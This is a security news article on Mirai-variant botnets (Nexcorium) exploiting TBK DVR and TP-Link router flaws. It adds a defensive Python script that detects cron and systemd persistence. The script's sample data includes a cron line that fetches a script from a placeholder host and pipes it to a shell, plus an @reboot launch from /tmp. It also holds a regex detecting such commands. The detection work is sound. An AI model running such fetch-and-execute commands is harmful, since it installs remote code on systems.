Threat actors are exploiting flaws in TBK DVR devices and end-of-life TP-Link Wi-Fi routers to deploy Mirai botnet variants on compromised systems, according to a technical analysis by Fortinet FortiGuard Labs and a disclosure from Palo Alto Networks Unit 42. The activity includes abuse of CVE-2024-3721, a medium-severity flaw in TBK DVR-4104 and DVR-4216 devices, to spread a variant called Nexcorium.
KEY FACTS
- Targeted flaw: CVE-2024-3721 affects TBK DVR-4104 and DVR-4216 devices.
- Malware family: the payload is a Mirai variant named Nexcorium.
- Other targets: automated probes were also seen against CVE-2023-33538 on older TP-Link routers.
- Persistence: the malware uses crontab and systemd services to stay on infected devices.
The report says the attack on TBK DVRs starts by exploiting CVE-2024-3721 to drop a downloader script. That script then launches a payload matched to the device’s Linux architecture. Once active, the malware displays the message, “nexuscorp has taken control.”
Fortinet said Nexcorium shares traits with other Mirai-derived botnets, including XOR-encoded configuration data, a watchdog module and a DDoS attack module. It also includes an exploit for CVE-2017-17215, which targets Huawei HG532 devices, along with hard-coded usernames and passwords for brute-force attacks over Telnet.
If a Telnet login succeeds, the malware tries to gain a shell, set up persistence and connect to an external server for commands. The report says it can launch DDoS attacks over UDP, TCP and SMTP and deletes the original downloaded binary after persistence is established.
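As an added defensive example (not code from the Fortinet or Unit 42 reports), the Python triage script below flags crontab entries and systemd ExecStart= lines of the kind this persistence relies on: commands launched from volatile directories, or commands that fetch a script and pipe it straight to a shell. The sample crontab, the sample unit, the placeholder host and the directory list are constructed assumptions, not indicators from the reports.

```python
import re
from typing import Optional
# Constructed samples (not from the report): persistence that re-launches a dropped payload.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
@reboot /tmp/.x/arm7 > /dev/null 2>&1
*/5 * * * * wget -q http://[placeholder-host]/d.sh -O- | sh
"""
SAMPLE_UNIT = """\
[Unit]
Description=system update
[Service]
ExecStart=/dev/shm/.sys/mips
"""
# Payload staging dirs on a DVR or router, and fetch-and-pipe-to-shell downloader commands.
VOLATILE_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/var/run/")
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl|tftp)\b.*\|\s*(sh|bash|ash)\b")

def suspicious_command(cmd: str) -> Optional[str]:
    """Return why a command looks like botnet persistence, or None if it does not."""
    if DOWNLOAD_EXEC.search(cmd):
        return "downloads and pipes a script to a shell"
    for d in VOLATILE_DIRS:
        if d in cmd:
            return f"executes from volatile directory {d}"
    return None

def scan_crontab(text: str) -> list:
    """Flag crontab lines whose command part matches the persistence pattern."""
    hits = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # '@reboot cmd' has one schedule field; otherwise five fields precede the command.
        parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        reason = suspicious_command(parts[-1] if len(parts) > 1 else "")
        if reason:
            hits.append((line, reason))
    return hits

def scan_unit(text: str) -> list:
    """Flag ExecStart= lines of a systemd unit that match the same pattern."""
    hits = []
    for line in text.splitlines():
        if line.startswith("ExecStart="):
            reason = suspicious_command(line[len("ExecStart="):])
            if reason:
                hits.append((line, reason))
    return hits
```

On a real device, feed it the output of `crontab -l` for each user and the unit files under /etc/systemd/system; a hit is a lead for manual review, not proof of infection.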
Unit 42 said it also observed automated attempts to exploit CVE-2023-33538 on older TP-Link routers, but the observed method was flawed and would not lead to compromise. The vulnerability affects TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10, which are no longer supported.
Researchers said successful exploitation of the TP-Link flaw requires authentication to the router’s web interface. They advised users to replace unsupported devices and avoid default credentials, which can turn a limited weakness into a broader entry point for attackers.
WHY IT MATTERS
The findings show how attackers continue to use known flaws, weak passwords and outdated IoT devices to grow botnets and support DDoS campaigns. For owners of exposed cameras, DVRs and routers, patching where possible and replacing unsupported hardware remain the main defenses.

